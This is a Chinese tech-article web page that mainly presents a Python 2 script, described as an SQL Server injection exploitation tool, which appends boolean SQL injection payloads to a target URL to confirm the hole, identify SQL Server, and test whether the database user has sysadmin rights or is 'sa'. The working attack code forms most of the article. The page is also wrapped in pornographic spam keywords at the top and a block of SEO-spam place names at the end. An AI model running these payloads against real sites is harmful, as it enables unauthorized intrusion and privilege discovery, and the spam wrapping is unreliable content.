做爰高潮a片〈毛片〉,尤物av天堂一区二区在线观看,一本久久A久久精品VR综合,添女人荫蒂全部过程av

最新文章專題視頻專題問答1問答10問答100問答1000問答2000關(guān)鍵字專題1關(guān)鍵字專題50關(guān)鍵字專題500關(guān)鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關(guān)鍵字專題關(guān)鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
當(dāng)前位置: 首頁 - 科技 - 知識百科 - 正文

Python編寫檢測數(shù)據(jù)庫SA用戶的方法

來源:懂視網(wǎng) 責(zé)編:小采 時間:2020-11-27 14:38:20
文檔

Python編寫檢測數(shù)據(jù)庫SA用戶的方法

Python編寫檢測數(shù)據(jù)庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當(dāng)前數(shù)據(jù)庫用戶是否為sa,詳細(xì)代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll
推薦度:
導(dǎo)讀Python編寫檢測數(shù)據(jù)庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當(dāng)前數(shù)據(jù)庫用戶是否為sa,詳細(xì)代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll

本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當(dāng)前數(shù)據(jù)庫用戶是否為sa,詳細(xì)代碼如下:

# Code by zhaoxiaobu Email: little.bu@hotmail.com 
#-*- coding: UTF-8 -*- 
from sys import exit 
from urllib import urlopen 
from string import join,strip 
from re import search 
 
def is_sqlable(): 
 sql1="%20and%201=2" 
 sql2="%20and%201=1" 
 urlfile1=urlopen(url+sql1) 
 urlfile2=urlopen(url+sql2) 
 htmlcodes1=urlfile1.read() 
 htmlcodes2=urlfile2.read() 
 if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
 print "[信息]恭喜!這個URL是有注入漏洞的!n" 
 print "[信息]現(xiàn)在判斷數(shù)據(jù)庫是否是SQL Server,請耐心等候....." 
 is_SQLServer() 
 else: 
 print "[錯誤]你確定這個URL能用?換個別的試試吧!n"

def is_SQLServer(): 
 sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
 urlfile=urlopen(url+sql) 
 htmlcodes=urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]數(shù)據(jù)庫好像不是SQL Server的!n" 
 else: 
 print "[信息]確認(rèn)是SQL Server數(shù)據(jù)庫!n" 
 print "[信息]開始檢測當(dāng)前數(shù)據(jù)庫用戶權(quán)限,請耐心等待......" 
 is_sysadmin() 
 
 
def is_sysadmin(): 
 sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
 urlfile = urlopen(url+sql) 
 htmlcodes = urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]當(dāng)前數(shù)據(jù)庫用戶不具有sysadmin權(quán)限!n" 
 else: 
 print "[信息]當(dāng)前數(shù)據(jù)庫用戶具有sysadmin權(quán)限!n" 
 print "[信息]檢測當(dāng)前用戶是不是SA,請耐心等待......" 
 is_sa() 
 
def is_sa(): 
 sql = "%20and%20'sa'=(select%20System_user)"; 
 urlfile = urlopen(url+sql) 
 htmlcodes = urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]當(dāng)前數(shù)據(jù)庫用戶不是SA!n" 
 else: 
 print "[信息]當(dāng)前數(shù)據(jù)庫用戶是SA!n" 
 
print "n########################################################################n" 
print " ^o^SQL Server注入利用工具^o^ " 
print " Email: little.bu@hotmail.comn" 
print "========================================================================"; 
url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:') 
if url == '': 
 print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式" 
 exit(1) 
 
judge = raw_input("[信息]請?zhí)峁┮粋€判斷字符串.n判斷字符串:") 
if judge == '': 
 print "[錯誤]判斷字符串不能為空!" 
 exit(1) 
 
is_sqlable()

聲明:本網(wǎng)頁內(nèi)容旨在傳播知識,若有侵權(quán)等問題請及時與本網(wǎng)聯(lián)系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

文檔

Python編寫檢測數(shù)據(jù)庫SA用戶的方法

Python編寫檢測數(shù)據(jù)庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當(dāng)前數(shù)據(jù)庫用戶是否為sa,詳細(xì)代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll
推薦度:
標(biāo)簽: 方法 用戶 數(shù)據(jù)
  • 熱門焦點

最新推薦

猜你喜歡

熱門推薦

專題
Top
主站蜘蛛池模板: 延吉市| 闸北区| 昆明市| 嘉定区| 灵台县| 出国| 万州区| 抚宁县| 岳阳县| 汉中市| 综艺| 桦甸市| 开平市| 永川市| 靖江市| 寿宁县| 孟津县| 宁乡县| 临武县| 广东省| 余庆县| 当雄县| 三原县| 榆林市| 英德市| 文登市| 大田县| 天台县| 佳木斯市| 五河县| 南京市| 布尔津县| 禄劝| 江达县| 禹城市| 隆化县| 临西县| 西乡县| 瑞昌市| 武安市| 渝北区|